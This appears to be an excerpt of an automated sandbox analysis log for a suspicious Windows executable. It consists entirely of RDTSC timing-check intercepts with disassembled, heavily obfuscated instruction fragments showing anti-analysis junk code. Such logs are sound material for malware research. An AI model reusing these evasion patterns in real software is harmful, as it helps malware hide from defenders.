Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0227 second address: 74F023F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6D94F51084h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F023F second address: 74F02D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94B296FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c pushad 0x0000000d call 00007F6D94B29704h 0x00000012 pop ebx 0x00000013 mov ebx, eax 0x00000015 popad 0x00000016 push eax 0x00000017 jmp 00007F6D94B29703h 0x0000001c xchg eax, edi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F6D94B296FBh 0x00000026 and si, FFCEh 0x0000002b jmp 00007F6D94B29709h 0x00000030 popfd 0x00000031 pushfd 0x00000032 jmp 00007F6D94B29700h 0x00000037 and ecx, 2DB88048h 0x0000003d jmp 00007F6D94B296FBh 0x00000042 popfd 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F02D1 second address: 74F02FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94F51089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6D94F5107Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F02FF second address: 74F0364 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94B29701h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000030h] 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F6D94B296FCh 0x00000016 add eax, 5D1A7038h 0x0000001c jmp 00007F6D94B296FBh 0x00000021 popfd 0x00000022 jmp 00007F6D94B29708h 0x00000027 popad 0x00000028 push dword ptr [eax+18h] 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F6D94B296FAh 0x00000034 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0364 second address: 74F0368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0368 second address: 74F036E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F039C second address: 74F0476 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a pushad 0x0000000b movsx edi, cx 0x0000000e movzx eax, bx 0x00000011 popad 0x00000012 test esi, esi 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F6D94F51087h 0x0000001b adc al, FFFFFFCEh 0x0000001e jmp 00007F6D94F51089h 0x00000023 popfd 0x00000024 pushad 0x00000025 movzx eax, di 0x00000028 mov bx, 282Eh 0x0000002c popad 0x0000002d popad 0x0000002e je 00007F6E02FE032Eh 0x00000034 jmp 00007F6D94F51085h 0x00000039 sub eax, eax 0x0000003b jmp 00007F6D94F51087h 0x00000040 mov dword ptr [esi], edi 0x00000042 jmp 00007F6D94F51086h 0x00000047 mov dword ptr [esi+04h], eax 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d mov ecx, edi 0x0000004f pushfd 0x00000050 jmp 00007F6D94F51089h 0x00000055 xor cx, 0B26h 0x0000005a jmp 00007F6D94F51081h 0x0000005f popfd 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0476 second address: 74F0486 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6D94B296FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0486 second address: 74F048A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F048A second address: 74F04C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F6D94B29708h 0x00000014 and esi, 4F8E7F28h 0x0000001a jmp 00007F6D94B296FBh 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F04C4 second address: 74F04CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F04CA second address: 74F0558 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+0Ch], eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F6D94B29709h 0x00000012 or ch, FFFFFFF6h 0x00000015 jmp 00007F6D94B29701h 0x0000001a popfd 0x0000001b mov di, si 0x0000001e popad 0x0000001f mov eax, dword ptr [ebx+4Ch] 0x00000022 jmp 00007F6D94B296FAh 0x00000027 mov dword ptr [esi+10h], eax 0x0000002a jmp 00007F6D94B29700h 0x0000002f mov eax, dword ptr [ebx+50h] 0x00000032 jmp 00007F6D94B29700h 0x00000037 mov dword ptr [esi+14h], eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F6D94B29707h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0558 second address: 74F05C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F6D94F51085h 0x0000000b add eax, 711C3CC6h 0x00000011 jmp 00007F6D94F51081h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [ebx+54h] 0x0000001d jmp 00007F6D94F5107Eh 0x00000022 mov dword ptr [esi+18h], eax 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F6D94F5107Eh 0x0000002c xor ax, 9098h 0x00000031 jmp 00007F6D94F5107Bh 0x00000036 popfd 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F05C7 second address: 74F060C instructions: 0x00000000 rdtsc 0x00000002 mov al, B8h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [ebx+58h] 0x0000000a pushad 0x0000000b jmp 00007F6D94B296FDh 0x00000010 pushfd 0x00000011 jmp 00007F6D94B29700h 0x00000016 and al, 00000028h 0x00000019 jmp 00007F6D94B296FBh 0x0000001e popfd 0x0000001f popad 0x00000020 mov dword ptr [esi+1Ch], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 movsx edi, cx 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F060C second address: 74F067B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6D94F51084h 0x00000009 or ch, FFFFFFB8h 0x0000000c jmp 00007F6D94F5107Bh 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov eax, dword ptr [ebx+5Ch] 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F6D94F51084h 0x0000001f add ecx, 0E4A5A18h 0x00000025 jmp 00007F6D94F5107Bh 0x0000002a popfd 0x0000002b mov di, cx 0x0000002e popad 0x0000002f mov dword ptr [esi+20h], eax 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F6D94F51081h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F067B second address: 74F06C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94B29701h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+60h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F6D94B29703h 0x00000015 jmp 00007F6D94B29703h 0x0000001a popfd 0x0000001b mov dl, ah 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F06C1 second address: 74F06C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F06C7 second address: 74F06E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94B296FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+24h], eax 0x0000000e pushad 0x0000000f mov ebx, ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 mov bx, cx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F06E4 second address: 74F0718 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [ebx+64h] 0x0000000a jmp 00007F6D94F5107Eh 0x0000000f mov dword ptr [esi+28h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F6D94F51087h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0718 second address: 74F077E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6D94B29702h 0x00000009 sub si, 2858h 0x0000000e jmp 00007F6D94B296FBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [ebx+68h] 0x0000001a jmp 00007F6D94B29706h 0x0000001f mov dword ptr [esi+2Ch], eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov si, dx 0x00000028 jmp 00007F6D94B29709h 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F077E second address: 74F07B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6D94F51087h 0x00000008 movzx eax, di 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ax, word ptr [ebx+6Ch] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 call 00007F6D94F5107Ch 0x0000001a pop esi 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F07B3 second address: 74F0825 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94B29707h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [esi+30h], ax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F6D94B296FBh 0x00000016 sub eax, 4578F49Eh 0x0000001c jmp 00007F6D94B29709h 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007F6D94B29700h 0x00000028 and eax, 7DFCB698h 0x0000002e jmp 00007F6D94B296FBh 0x00000033 popfd 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0825 second address: 74F08D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, bh 0x00000005 mov dx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ax, word ptr [ebx+00000088h] 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F6D94F51088h 0x00000019 or al, 00000028h 0x0000001c jmp 00007F6D94F5107Bh 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007F6D94F51088h 0x00000028 xor cx, AA88h 0x0000002d jmp 00007F6D94F5107Bh 0x00000032 popfd 0x00000033 popad 0x00000034 mov word ptr [esi+32h], ax 0x00000038 pushad 0x00000039 mov cl, 90h 0x0000003b pushfd 0x0000003c jmp 00007F6D94F51081h 0x00000041 and ax, F1A6h 0x00000046 jmp 00007F6D94F51081h 0x0000004b popfd 0x0000004c popad 0x0000004d mov eax, dword ptr [ebx+0000008Ch] 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F6D94F5107Dh 0x0000005a rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F08D1 second address: 74F097D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6D94B29707h 0x00000009 sbb eax, 39F0018Eh 0x0000000f jmp 00007F6D94B29709h 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esi+34h], eax 0x0000001d jmp 00007F6D94B296FCh 0x00000022 mov eax, dword ptr [ebx+18h] 0x00000025 jmp 00007F6D94B29700h 0x0000002a mov dword ptr [esi+38h], eax 0x0000002d pushad 0x0000002e jmp 00007F6D94B296FEh 0x00000033 push esi 0x00000034 pushfd 0x00000035 jmp 00007F6D94B29701h 0x0000003a jmp 00007F6D94B296FBh 0x0000003f popfd 0x00000040 pop esi 0x00000041 popad 0x00000042 mov eax, dword ptr [ebx+1Ch] 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F6D94B29702h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F097D second address: 74F09C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94F5107Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+3Ch], eax 0x0000000c jmp 00007F6D94F51086h 0x00000011 mov eax, dword ptr [ebx+20h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F6D94F51087h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F09C1 second address: 74F0A19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94B29709h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+40h], eax 0x0000000c pushad 0x0000000d movzx esi, bx 0x00000010 call 00007F6D94B29709h 0x00000015 mov ah, D4h 0x00000017 pop ebx 0x00000018 popad 0x00000019 lea eax, dword ptr [ebx+00000080h] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F6D94B296FFh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0A19 second address: 74F0A1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0A1F second address: 74F0AC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94B296FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 00000001h 0x0000000d pushad 0x0000000e mov al, D6h 0x00000010 mov dh, 59h 0x00000012 popad 0x00000013 nop 0x00000014 pushad 0x00000015 jmp 00007F6D94B29706h 0x0000001a mov esi, 6B9D9211h 0x0000001f popad 0x00000020 push eax 0x00000021 pushad 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F6D94B29703h 0x00000029 sbb eax, 60CAEFFEh 0x0000002f jmp 00007F6D94B29709h 0x00000034 popfd 0x00000035 pushfd 0x00000036 jmp 00007F6D94B29700h 0x0000003b sub ecx, 38FF86F8h 0x00000041 jmp 00007F6D94B296FBh 0x00000046 popfd 0x00000047 popad 0x00000048 mov bl, cl 0x0000004a popad 0x0000004b nop 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F6D94B296FEh 0x00000053 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0AC5 second address: 74F0ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0ACB second address: 74F0B05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-10h] 0x0000000b jmp 00007F6D94B29709h 0x00000010 nop 0x00000011 jmp 00007F6D94B296FEh 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0B05 second address: 74F0B09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0B09 second address: 74F0B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0B0F second address: 74F0B25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6D94F51082h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0B25 second address: 74F0B3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6D94B296FAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0B6F second address: 74F0BBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94F5107Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b jmp 00007F6D94F51086h 0x00000010 js 00007F6E02FDFBA3h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov esi, ebx 0x0000001b call 00007F6D94F51089h 0x00000020 pop ecx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0BBC second address: 74F0BEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6D94B296FCh 0x00000009 jmp 00007F6D94B29705h 0x0000000e popfd 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 mov eax, dword ptr [ebp-0Ch] 0x00000017 pushad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0BEE second address: 74F0C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6D94F51086h 0x00000009 popad 0x0000000a mov edi, esi 0x0000000c popad 0x0000000d mov dword ptr [esi+04h], eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007F6D94F51088h 0x00000019 or ch, FFFFFFE8h 0x0000001c jmp 00007F6D94F5107Bh 0x00000021 popfd 0x00000022 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0C3A second address: 74F0CB6 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6D94B29708h 0x00000008 or si, 1848h 0x0000000d jmp 00007F6D94B296FBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007F6D94B29708h 0x0000001b add cx, 5AA8h 0x00000020 jmp 00007F6D94B296FBh 0x00000025 popfd 0x00000026 popad 0x00000027 lea eax, dword ptr [ebx+78h] 0x0000002a pushad 0x0000002b mov di, cx 0x0000002e call 00007F6D94B29700h 0x00000033 mov dh, ch 0x00000035 pop edx 0x00000036 popad 0x00000037 push 00000001h 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0CB6 second address: 74F0CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0CBA second address: 74F0CC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0CC0 second address: 74F0D28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6D94F5107Ch 0x00000009 add ah, 00000068h 0x0000000c jmp 00007F6D94F5107Bh 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F6D94F51088h 0x00000018 and al, FFFFFFC8h 0x0000001b jmp 00007F6D94F5107Bh 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 nop 0x00000025 jmp 00007F6D94F51086h 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0D28 second address: 74F0D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0D2C second address: 74F0D30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0D30 second address: 74F0D36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0D36 second address: 74F0D5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov eax, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6D94F51088h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0D5B second address: 74F0D84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94B296FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6D94B29705h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0D84 second address: 74F0D8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0D8A second address: 74F0D8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0D8E second address: 74F0DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6D94F5107Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0DA4 second address: 74F0DAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 9CEAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0E19 second address: 74F0E1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0E1D second address: 74F0E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0E23 second address: 74F0E29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0E29 second address: 74F0E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0E2D second address: 74F0EA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94F5107Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushad 0x0000000f jmp 00007F6D94F5107Eh 0x00000014 mov eax, 6C607CD1h 0x00000019 popad 0x0000001a mov dword ptr [esi+08h], eax 0x0000001d pushad 0x0000001e mov bl, al 0x00000020 pushfd 0x00000021 jmp 00007F6D94F5107Fh 0x00000026 xor cx, 8BBEh 0x0000002b jmp 00007F6D94F51089h 0x00000030 popfd 0x00000031 popad 0x00000032 lea eax, dword ptr [ebx+70h] 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F6D94F5107Dh 0x0000003c rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0EA1 second address: 74F0EA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0EA7 second address: 74F0F18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a pushad 0x0000000b movsx edx, si 0x0000000e mov cl, 4Dh 0x00000010 popad 0x00000011 push esi 0x00000012 pushad 0x00000013 movzx eax, bx 0x00000016 mov bx, 54C4h 0x0000001a popad 0x0000001b mov dword ptr [esp], eax 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F6D94F51089h 0x00000025 sub cx, 68B6h 0x0000002a jmp 00007F6D94F51081h 0x0000002f popfd 0x00000030 mov edx, esi 0x00000032 popad 0x00000033 lea eax, dword ptr [ebp-18h] 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F6D94F51089h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0F18 second address: 74F0F1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F0FF9 second address: 74F1016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6D94F51089h 0x00000009 rdtsc
